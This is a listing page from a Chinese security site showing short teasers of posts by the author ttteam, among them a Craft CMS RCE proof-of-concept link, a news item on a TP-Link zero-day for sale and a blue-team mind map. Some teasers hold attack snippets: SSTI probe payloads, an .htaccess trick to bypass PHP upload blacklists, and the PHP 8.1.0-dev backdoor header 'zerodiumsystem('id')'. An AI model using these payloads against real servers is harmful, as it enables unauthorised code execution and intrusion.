ttteam | CN-SEC 中文网

安全漏洞

CVE-2024-56145：Craft CMS RCE POC

该问题是由于对用户提供的模板路径处理不当而引起的，允许攻击者通过特制的有效载荷实现远程代码执行 (RCE) 。https://github.com/Chocapikk/CVE-2024-56145 原...

04月23日22 views评论

阅读全文

安全工具

gitrecon：GitHub 存储库扫描仪

此工具使用 GitHub API 扫描用户拥有的存储库，以查找电子邮件地址和关联名称。它提供扫描特定存储库和排除分叉存储库的选项。此外，您还可以提供 GitHub API 令牌来提高 API 请求的速...

04月08日6 views评论

阅读全文

安全文章

SSTI Payload

"{{7*7}}""${7*7}""<%= 7 * 7 %>"原文始发于微信公众号（TtTeam）：SSTI Payload

03月19日4 views评论

阅读全文

安全新闻

TP-Link 0 day漏洞在暗网上出售

据称，一名威胁行为者宣传 TP-Link RCE 漏洞，声称它可以自主传播、窃取凭证并持续存在而不被发现。价格：1,000 至 2,000 美元。原文始发于微信公众号（TtTeam）：TP-Link...

03月10日29 views评论

阅读全文

安全文章

提取所有API接口

curl -s URL | grep -Po "(/)((?:[a-zA-Z-_:.0-9{}]+))(/)*((?:[a-zA-Z-_:.0-9{}]+))(/)((?:[a-zA-Z-_/:.0-...

02月28日9 views评论

阅读全文

安全文章

PHP 黑名单绕过上传

上传 .htaccess 文件可以强制服务器将任何扩展名视为 PHP 文件原文始发于微信公众号（TtTeam）：PHP 黑名单绕过上传

02月05日8 views评论

阅读全文

安全文章

PHP 8.1.0-dev RCE & SQLi

User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id');原文始发于微信公众号（TtTeam）：PHP 8.1.0-dev RC...

01月21日40 views评论

阅读全文

安全工具

Exchange 信息收集工具

01 工具介绍 Exchange 信息收集工具参考项目 https://github.com/Ridter/owa_info/ https://3gstudent.github.io/%E6%B8%...

09月18日22 views评论

阅读全文

HW&HVV

Hvv 吃瓜 3

原文始发于微信公众号（TtTeam）：Hvv 吃瓜 3

07月26日61 views评论

阅读全文

HW&HVV

Hvv 吃瓜 2

Hvv 吃瓜 1原文始发于微信公众号（TtTeam）：Hvv 吃瓜 2

07月25日97 views评论

阅读全文

HW&HVV

Hvv 吃瓜 1

原文始发于微信公众号（TtTeam）：Hvv 吃瓜 1

07月24日91 views评论

阅读全文

HW&HVV

蓝队思维图

原文始发于微信公众号（TtTeam）：蓝队思维图

07月02日27 views评论

阅读全文

在线咨询

微信